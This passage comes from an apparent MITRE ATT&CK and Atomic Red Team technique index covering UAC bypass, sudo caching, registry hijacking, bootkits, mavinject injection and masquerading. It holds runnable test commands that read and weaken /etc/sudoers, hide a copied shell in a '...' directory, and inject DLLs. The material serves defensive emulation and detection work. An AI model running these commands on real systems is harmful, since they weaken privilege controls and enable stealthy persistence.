benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)\n\nCommon file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type." kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.0' identifier: T1036.007 atomic_tests: [] T1548.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073 created: '2020-01-30T14:24:34.977Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1548/002 external_id: T1548.002 - source_name: Davidson Windows description: Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014. url: http://www.pretentiousname.com/misc/win7_uac_whitelist2.html - source_name: TechNet How UAC Works description: Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016. url: https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works - source_name: SANS UAC Bypass description: Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016. url: http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass - source_name: MSDN COM Elevation description: Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016. url: https://msdn.microsoft.com/en-us/library/ms679687.aspx - source_name: enigma0x3 Fileless UAC Bypass description: Nelson, M. (2016, August 15). "Fileless" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016. url: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - source_name: enigma0x3 sdclt app paths description: Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017. url: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ - source_name: enigma0x3 sdclt bypass description: Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017. url: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ - source_name: TechNet Inside UAC description: 'Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016.' url: https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx - source_name: Fortinet Fareit description: Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016. url: https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware - source_name: Github UACMe description: UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016. url: https://github.com/hfiref0x/UACME object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:25.823Z' name: 'Abuse Elevation Control Mechanism: Bypass User Account Control' description: |- Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works) If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit) Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Stefan Kanthak - Casey Smith x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.2' identifier: T1548.002 atomic_tests: [] T1548.003: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0 created: '2020-01-30T14:34:44.992Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1548/003 external_id: T1548.003 - source_name: sudo man page 2018 description: Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018. url: https://www.sudo.ws/ - source_name: OSX.Dok Malware description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017. url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ - source_name: cybereason osx proton description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually Does. Retrieved March 19, 2018. url: https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:26.105Z' name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching' description: |- Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges. Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again). The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though. Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user. In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \'Defaults !tty_tickets\' >> /etc/sudoers.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS x_mitre_version: '1.1' identifier: T1548.003 atomic_tests: - name: Sudo usage auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. ' supported_platforms: - macos - linux executor: name: sh elevation_required: true command: "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n" - name: Unlimited sudo cache timeout auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc description: 'Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using ''visudo'', do not do this on a production system. ' supported_platforms: - macos - linux executor: name: sh elevation_required: true command: | sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers sudo visudo -c -f /etc/sudoers - name: Disable tty_tickets for sudo caching auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1 description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. ' supported_platforms: - macos - linux executor: name: sh elevation_required: true command: | sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers" sudo visudo -c -f /etc/sudoers T1578: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--144e007b-e638-431d-a894-45d90c54ab90 created: '2019-08-30T18:03:05.864Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1578 external_id: T1578 - source_name: Mandiant M-Trends 2020 description: Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024. url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:26.284Z' name: Modify Cloud Compute Infrastructure description: |- An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots. Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - IaaS x_mitre_version: '1.2' atomic_tests: [] T1542.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada created: '2019-12-19T19:43:34.507Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1542/001 external_id: T1542.001 - source_name: McAfee CHIPSEC Blog description: Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017. url: https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/ - source_name: MITRE Copernicus description: 'Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.' url: http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about - source_name: Intel HackingTeam UEFI Rootkit description: Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved November 17, 2024. url: https://web.archive.org/web/20170313124421/http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html - source_name: Github CHIPSEC description: Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017. url: https://github.com/chipsec/chipsec - source_name: About UEFI description: UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016. url: http://www.uefi.org/about - source_name: MITRE Trustworthy Firmware Measurement description: Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016. url: http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research - source_name: Wikipedia UEFI description: Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. Retrieved July 11, 2017. url: https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface - source_name: Wikipedia BIOS description: Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016. url: https://en.wikipedia.org/wiki/BIOS object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:26.714Z' name: 'Pre-OS Boot: System Firmware' description: |- Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.(Citation: Wikipedia BIOS)(Citation: Wikipedia UEFI)(Citation: About UEFI) System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Jean-Ian Boutin, ESET - McAfee - Ryan Becwar x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - Network Devices x_mitre_version: '1.2' identifier: T1542.001 atomic_tests: [] T1574.011: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c created: '2020-03-13T11:42:14.444Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1574/011 external_id: T1574.011 - source_name: Tweet Registry Perms Weakness description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved September 12, 2024." url: https://x.com/r0wdy_/status/936365549553991680 - source_name: insecure_reg_perms description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021. url: https://itm4n.github.io/windows-registry-rpceptmapper-eop/ - source_name: hexacorn description: hexacorn. (2015, January 13). Beyond good ol’ Run key, Part 24. Retrieved September 25, 2025. url: https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/ - source_name: Kansa Service related collectors description: 'Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.' url: https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html - source_name: malware_hides_service description: Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021. url: https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/ - source_name: Autoruns for Windows description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020. url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - source_name: MDSec description: MDSec. (n.d.). Autodial(DLL)ing Your Way. Retrieved September 25, 2025. url: https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/ - source_name: Registry Key Security description: Microsoft. (2018, May 31). Registry Key Security and Access Rights. Retrieved March 16, 2017. url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN - source_name: microsoft_services_registry_tree description: Microsoft. (2021, August 5). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved August 25, 2021. url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree - source_name: gendigital description: 'Threat Research Team. (2022, March 22). Operation Dragon Castling: APT group targeting betting companies. Retrieved September 25, 2025.' url: https://www.gendigital.com/blog/insights/research/operation-dragon-castling-apt-group-targeting-betting-companies object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:27.075Z' name: 'Hijack Execution Flow: Services Registry Permissions Weakness' description: |- Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Flaws in the permissions for Registry keys related to services can allow adversaries to redirect the originally specified executable to one they control, launching their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service) If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness) The Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms) Adversaries may also add the Parameters key, which can reference malicious drivers file paths. This technique has been identified to be a method of abuse by configuring DLL file paths within the Parameters key of a given services registry configuration. By placing and configuring the Parameters key to reference a malicious DLL, adversaries can ensure that their code is loaded persistently whenever the associated service or library is invoked. For example, the registry path(Citation: MDSec) HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters(Citation: hexacorn)(Citation: gendigital) contains the AutodiaDLL value, which specifies the DLL to be loaded for autodial funcitionality. An adversary could set the AutodiaDLL to point to a hijacked or malicious DLL: "AutodialDLL"="c:\temp\foo.dll" This ensures persistence, as it causes the DLL (in this case, foo.dll) to be loaded each time the Winsock 2 library is invoked. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.3.0 x_mitre_contributors: - Travis Smith, Tripwire - Matthew Demaske, Adaptforward - Joe Gumke, U.S. Bank x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.3' identifier: T1574.011 atomic_tests: [] T1542.003: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba created: '2019-12-19T21:05:38.123Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1542/003 external_id: T1542.003 - source_name: Lau 2011 description: Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? (Infographic). Retrieved November 13, 2014. url: http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion - source_name: Mandiant M Trends 2016 description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved November 17, 2024. url: https://web.archive.org/web/20211024160454/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf - source_name: welivesecurity description: 'Martin Smolár. (2023, March 1). BlackLotus UEFI bootkit: Myth confirmed. Retrieved February 11, 2025.' url: https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/ - source_name: Microsoft Security description: 'Microsoft Incident Response. (2023, April 11). Guidance for investigating attacks using CVE-2022-21894: The BlackLotus campaign. Retrieved February 12, 2025.' url: https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:28.341Z' name: Bootkit description: |- Adversaries may use bootkits to persist on systems. A bootkit is a malware variant that modifies the boot sectors of a hard drive, allowing malicious code to execute before a computer's operating system has loaded. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly. In BIOS systems, a bootkit may modify the Master Boot Record (MBR) and/or Volume Boot Record (VBR).(Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code.(Citation: Lau 2011) The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code. In UEFI (Unified Extensible Firmware Interface) systems, a bootkit may instead create or modify files in the EFI system partition (ESP). The ESP is a partition on data storage used by devices containing UEFI that allows the system to boot the OS and other utilities used by the system. An adversary can use the newly created or patched files in the ESP to run malicious kernel code.(Citation: Microsoft Security)(Citation: welivesecurity) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - Windows x_mitre_version: '1.2' atomic_tests: [] T1218.013: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--1bae753e-8e52-4055-a66d-2ead90303ca9 created: '2021-09-22T17:45:10.241Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1218/013 external_id: T1218.013 - source_name: ATT Lazarus TTP Evolution description: Fernando Martinez. (2021, July 6). Lazarus campaign TTPs and evolution. Retrieved September 22, 2021. url: https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution - source_name: LOLBAS Mavinject description: LOLBAS. (n.d.). Mavinject.exe. Retrieved September 22, 2021. url: https://lolbas-project.github.io/lolbas/Binaries/Mavinject/ - source_name: Mavinject Functionality Deconstructed description: Matt Graeber. (2018, May 29). mavinject.exe Functionality Deconstructed. Retrieved September 22, 2021. url: https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e - source_name: Reaqta Mavinject description: 'Reaqta. (2017, December 16). From False Positive to True Positive: the story of Mavinject.exe, the Microsoft Injector. Retrieved September 22, 2021.' url: https://reaqta.com/2017/12/mavinject-microsoft-injector/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:28.606Z' name: Mavinject description: "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)\n\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. \n\nIn addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.0' atomic_tests: [] T1036.005: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2 created: '2020-02-10T20:43:10.239Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1036/005 external_id: T1036.005 - source_name: Twitter ItsReallyNick Masquerading Update description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved September 12, 2024. url: https://x.com/ItsReallyNick/status/1055321652777619457 - source_name: Docker Images description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021. url: https://docs.docker.com/engine/reference/commandline/images/ - source_name: Elastic Masquerade Ball description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.' url: https://www.elastic.co/blog/how-hunt-masquerade-ball - source_name: Aquasec Kubernetes Backdoor 2023 description: Michael Katchinskiy and Assaf Morag. (2023, April 21). First-Ever Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved March 24, 2025. url: https://www.aquasec.com/blog/leveraging-kubernetes-rbac-to-backdoor-clusters/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:28.950Z' name: 'Masquerading: Match Legitimate Name or Location' description: "Adversaries may match or approximate the name or location of legitimate files, Registry keys, or other resources when naming/placing them. This is done for the sake of evading defenses and observation. \n\nThis may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: `svchost.exe`). Alternatively, a Windows Registry key may be given a close approximation to a key used by a legitimate program. In containerized environments, a threat actor may create a resource in a trusted namespace or one that matches the naming convention of a container pod or cluster.(Citation: Aquasec Kubernetes Backdoor 2023)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Yossi Weizman, Azure Defender Research Team - Vishwas Manral, McAfee x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Containers - ESXi - Linux - macOS - Windows x_mitre_version: '2.0' identifier: T1036.005 atomic_tests: - name: Execute a process from a directory masquerading as the current parent directory auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24 description: 'Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) ' supported_platforms: - macos - linux input_arguments: test_message: description: Test message to echo out to the screen type: string default: Hello from the Atomic Red Team test T1036.005#1 executor: name: sh elevation_required: false command: | mkdir $HOME/... cp $(which sh) $HOME/... $HOME/.../sh -c "echo #{test_message}" cleanup_command: | rm -f $HOME/.../sh rmdir $HOME/.../ T1600: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8 created: '2020-10-19T18:47:08.759Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1600 external_id: T1600 - source_name: Cisco Synful Knock Evolution description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020. url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices - source_name: Cisco Blog Legacy Device Attacks description: Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:30.124Z' name: Weaken Encryption description: |- Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution) Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key. Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Network Devices x_mitre_version: 